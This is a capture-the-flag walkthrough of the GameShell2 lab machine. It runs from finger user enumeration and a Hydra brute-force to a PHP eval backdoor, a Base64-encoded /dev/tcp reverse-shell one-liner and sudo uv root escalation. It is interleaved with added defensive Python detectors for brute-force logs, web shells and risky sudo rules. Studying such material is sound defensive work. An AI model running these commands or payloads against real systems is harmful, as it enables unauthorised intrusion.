This document records the entire penetration process of the GameShell2 target machine. First, directory scanning revealed a website user list and the /terminal authentication interface. By combining this with the Finger service on port 79, the valid user 'dt' was enumerated, and Hydra was used to brute-force the web login credentials. Subsequently, a hidden site dev.astra.dsz and a backdoor file backdoor.php were discovered in the Apache configuration. After connecting with the phpsploit tool, a Base64-encoded reverse shell payload was executed to gain initial access. Finally, 'sudo -l' showed that the www-data user could execute /usr/local/bin/uv without a password; running bash through it escalated privileges to root.

Enumeration

# Nmap 7.95 scan initiated Thu Dec 11 07:38:55 2025 as: /usr/lib/nmap/nmap --privileged -T4 --open -Pn -sV -v -oN nmap 192.168.110.17
Nmap scan report for GameShell2.lan (192.168.110.17)
Host is up (0.00019s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
79/tcp open  finger  OpenBSD fingerd (ported to Linux)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
MAC Address: 08:00:27:9A:11:EA (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: GameShell2; OSs: Linux, Linux 4.19.0-27-amd64; CPE: cpe:/o:linux:linux_kernel, cpe:/o:linux:linux_kernel:4.19.0-27-amd64

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 11 07:39:07 2025 -- 1 IP address (1 host up) scanned in 11.96 seconds

Website

$ gobuster dir -u http://192.168.110.17 -w /usr/share/wordlists/dirb/common.txt -x txt,php,html,bak                                                   
===============================================================             
Gobuster v3.8                                                               
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)               
===============================================================
[+] Url:                     http://192.168.110.17                          
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt           
[+] Negative Status codes:   404                                            
[+] User Agent:              gobuster/3.8
[+] Extensions:              html,bak,txt,php
[+] Timeout:                 10s                                            
===============================================================             
Starting gobuster in directory enumeration mode                             
===============================================================             
/.hta.html            (Status: 403) [Size: 279]
/.hta.bak             (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.hta.php             (Status: 403) [Size: 279]        
/.hta.txt             (Status: 403) [Size: 279]
/.hta                 (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htaccess.bak        (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd.bak        (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 14134]
/index.html           (Status: 200) [Size: 14134]
/robots.txt           (Status: 200) [Size: 35]
/robots.txt           (Status: 200) [Size: 35]
/server-status        (Status: 403) [Size: 279]
/terminal             (Status: 401) [Size: 461]
/users.html           (Status: 200) [Size: 2052]

wget http://192.168.110.17/users.html

for user in $(cat valid_users_list.txt); do
    result=$(finger "$user@192.168.110.17" 2>&1 | grep "Login:")
    if [ -n "$result" ]; then
        echo "Found valid user: $user"
        echo "$result"
        break
    fi
done

hydra -l dt -P /usr/share/wordlists/rockyou.txt -f 192.168.110.17 http-get /terminal

--> dt:purple1
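From the defender's side, every wrong guess Hydra sends at /terminal is answered with a 401 and lands in the Apache access log, and the one guess that works is a 200 from the same client on the same path a moment later. The following Python detector is an added example, not part of the original walkthrough; it assumes Apache's "combined" log format and runs over constructed sample lines (the client addresses and timestamps are made up for the demo).

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" access-log format (assumed; adjust LOG_RE for a custom LogFormat).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect_auth_bruteforce(lines, threshold=10, window_s=60):
    """Flag a client that collects `threshold` 401s on one path inside a sliding window,
    and separately flag a later 200 from that client on the same path (the guess that worked)."""
    recent = defaultdict(deque)   # (ip, path) -> timestamps of recent 401 responses
    flagged = set()
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["ip"], rec["path"])
        if rec["status"] == 401:
            q = recent[key]
            q.append(rec["ts"])
            # drop failures that fell out of the window
            while (rec["ts"] - q[0]).total_seconds() > window_s:
                q.popleft()
            if len(q) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("bruteforce", rec["ip"], rec["path"], len(q)))
        elif rec["status"] == 200 and key in flagged:
            alerts.append(("success-after-bruteforce", rec["ip"], rec["path"], rec["user"]))
    return alerts


# Constructed sample log: one benign hit, twelve rapid failed Basic-auth attempts on /terminal
# from one client, the guess that finally works, and a single unrelated 401 from elsewhere.
SAMPLE_LOG = (
    ['192.168.110.50 - - [11/Dec/2025:07:44:58 +0000] "GET /index.html HTTP/1.1" 200 14134 "-" "Mozilla/5.0"']
    + [f'192.168.110.141 - - [11/Dec/2025:07:45:{i:02d} +0000] "GET /terminal HTTP/1.1" 401 461 "-" "Mozilla/4.0 (Hydra)"'
       for i in range(12)]
    + ['192.168.110.141 - dt [11/Dec/2025:07:45:12 +0000] "GET /terminal HTTP/1.1" 200 1200 "-" "Mozilla/4.0 (Hydra)"',
       '192.168.110.60 - - [11/Dec/2025:07:46:00 +0000] "GET /terminal HTTP/1.1" 401 461 "-" "curl/8.0"']
)

if __name__ == "__main__":
    for alert in detect_auth_bruteforce(SAMPLE_LOG):
        print(*alert)
```

The "success-after-bruteforce" alert is the high-value one: a burst of 401s is noisy, but a 200 for the same client and path right after that burst means the credential is now known. The finger side of the enumeration has a simpler fix: fingerd on port 79 leaks valid login names to anyone and is rarely needed, so it should not be running.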

After playing the game we get dt:0t4tdtlt

/var/www also contains a dev directory, so there is probably another website

Check /etc/apache2/sites-available/dev.astra.dsz.conf

ffuf finds backdoor.php

python3 phpsploit

phpsploit > set TARGET http://dev.astra.dsz/backdoor.php
phpsploit > exploit
[*] Current backdoor is: <?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

[*] Sending payload to http://dev.astra.dsz:80/backdoor.php ...
[*] Shell obtained by PHP (127.0.0.1 -> 127.0.0.1)

Connected to Linux server (dev.astra.dsz)
running PHP 8.3.19 on Apache/2.4.62 (Debian)
phpsploit(dev.astra.dsz) > ls

Listing: /var/www/dev
=====================

Mode        Owner     Group     Size  Last Modified                   Name        
----        -----     -----     ----  -------------                   ----        
drwx------  www-data  www-data  4K    Fri Nov 21 11:49:56 +0000 2025  .
drwxr-xr-x  root      root      4K    Fri Nov 21 08:04:51 +0000 2025  ..
-rw-r--r--  root      root      44    Fri Nov 21 08:02:19 +0000 2025  backdoor.php
-rw-r--r--  root      root      68    Fri Nov 21 11:49:56 +0000 2025  index.html  

phpsploit(dev.astra.dsz) > printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC4xMTAuMTQxLzQ0NDQgMD4mMSkgJg==|base64 -d|bash
[-] Unknown Command: printf (use `run` plugin to run remote command)
[-] Unknown Command: | (use `run` plugin to run remote command)
[-] Unknown Command: base64 (use `run` plugin to run remote command)
[-] Unknown Command: | (use `run` plugin to run remote command)
[-] Unknown Command: bash (use `run` plugin to run remote command)
phpsploit(dev.astra.dsz) > run 'printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC4xMTAuMTQxLzQ0NDQgMD4mMSkgJg==|base64 -d|bash'
phpsploit(dev.astra.dsz) >
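The backdoor phpsploit talks to is a one-liner that passes a request header straight into eval(), which is also the pattern a webroot scan can catch. The following Python scanner is an added example (not part of the walkthrough or of phpsploit): it walks a directory, flags PHP files where a request-controlled input or a decoded blob reaches a code-execution sink, and is run here against a constructed temporary webroot holding the page's backdoor.php next to a benign file and a constructed obfuscated variant.

```python
import os
import re
import tempfile

# PHP functions that turn data into code or commands, and the request-controlled inputs
# that must never reach them. SINKS/SOURCES are a starting list, not an exhaustive one.
SINKS = r"(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open|create_function)"
SOURCES = r"\$_(?:SERVER|GET|POST|REQUEST|COOKIE|FILES)\b|php://input|getallheaders\s*\("
# sink( ... request input ... ) on one statement, optionally with '@' error suppression
DIRECT_RE = re.compile(r"@?\b" + SINKS + r"\s*\([^;]*?(?:" + SOURCES + r")", re.I)
# sink( base64_decode( ... ) ) and friends: a payload hidden behind a decoder
OBFUSCATED_RE = re.compile(
    r"@?\b" + SINKS + r"\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I
)


def scan_php_source(source):
    """Return [(line_number, reason), ...] for suspicious statements in one PHP file."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if DIRECT_RE.search(line):
            findings.append((lineno, "request data reaches code-execution sink"))
        elif OBFUSCATED_RE.search(line):
            findings.append((lineno, "decoded/obfuscated payload reaches code-execution sink"))
    return findings


def scan_webroot(root):
    """Map relative path -> findings for every PHP file under root that has any."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as f:
                findings = scan_php_source(f.read())
            if findings:
                hits[os.path.relpath(path, root)] = findings
    return hits


# Constructed sample webroot: the backdoor from this box, a benign page, and an obfuscated variant.
SAMPLE_FILES = {
    "backdoor.php": "<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>\n",
    "index.php": "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>\n",
    "obf.php": '<?php eval(base64_decode("Q09OU1RSVUNURUQ=")); ?>\n',   # constructed, not a real payload
}


def build_and_scan_sample():
    """Write the sample files into a temp dir and scan it; returns the hits dict."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in SAMPLE_FILES.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as f:
                f.write(body)
        return scan_webroot(root)


if __name__ == "__main__":
    for path, findings in sorted(build_and_scan_sample().items()):
        for lineno, reason in findings:
            print(f"{path}:{lineno}: {reason}")
```

On this box the file listing also gives a second signal that needs no content scan at all: backdoor.php is owned by root inside a directory owned by www-data, and a root-owned PHP file appearing in a webroot is worth an alert on its own.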

Privilege Escalation

www-data@GameShell2:/var/www$ sudo -l
Matching Defaults entries for www-data on GameShell2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on GameShell2:
    (ALL) NOPASSWD: /usr/local/bin/uv
www-data@GameShell2:/var/www$ sudo /usr/local/bin/uv run /bin/bash
root@GameShell2:/var/www# cat /root/root.txt
flag{root-983b0f2b5412aadd94ed08f249355686}
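The sudo rule is the whole privilege-escalation story: `uv run <command>` executes whatever command it is given, so a NOPASSWD rule for /usr/local/bin/uv with no argument restriction is equivalent to a NOPASSWD root shell. The following Python audit is an added example, not part of the walkthrough: it parses the text `sudo -l` prints, flags rules that hand out ALL commands or unrestricted access to a binary that can execute arbitrary programs, and runs over the page's own `sudo -l` output plus one constructed benign rule. SHELL_SPAWNERS is a hypothetical starter list to extend per host.

```python
import re

# One rule line of `sudo -l` output, e.g. "    (ALL) NOPASSWD: /usr/local/bin/uv"
SUDO_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+?)\s*$")

# Binaries that execute whatever argument or subcommand they are given (starter list, not exhaustive).
SHELL_SPAWNERS = {
    "/bin/bash", "/bin/sh", "/bin/dash", "/usr/bin/env",
    "/usr/bin/python3", "/usr/bin/perl",
    "/usr/local/bin/uv",   # `uv run <cmd>` runs an arbitrary command, as used on this box
    "/usr/bin/vim", "/usr/bin/find",
}


def parse_sudo_l(text):
    """Return [{'runas': ..., 'tags': {...}, 'cmds': [...]}, ...] from `sudo -l` output."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        # rules follow the "User X may run the following commands on HOST:" line
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip().upper() for t in m.group("tags").split(":") if t.strip()}
        cmds = [c.strip() for c in m.group("cmd").split(",")]
        rules.append({"runas": m.group("runas"), "tags": tags, "cmds": cmds})
    return rules


def audit_sudo_rules(rules):
    """Return [(severity, runas, command, reason), ...] for rules that amount to a root shell."""
    findings = []
    for rule in rules:
        for cmd in rule["cmds"]:
            words = cmd.split()
            if cmd == "ALL":
                reason = "ALL commands allowed"
            elif words[0] in SHELL_SPAWNERS and len(words) == 1:
                reason = "unrestricted arguments to a binary that can execute arbitrary commands"
            else:
                continue
            severity = "critical" if "NOPASSWD" in rule["tags"] else "high"
            findings.append((severity, rule["runas"], cmd, reason))
    return findings


# The `sudo -l` output from this box, plus one constructed benign rule for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on GameShell2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on GameShell2:
    (ALL) NOPASSWD: /usr/local/bin/uv
    (root) /usr/sbin/service apache2 restart
"""

if __name__ == "__main__":
    for finding in audit_sudo_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(*finding)
```

Pinning arguments in sudoers does not rescue this rule: any form of `uv run` still runs an arbitrary program, so the fix is to drop the uv entry rather than narrow it. The constructed service rule is left alone by the audit because its arguments are fixed and the binary is not in the spawner list.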

 
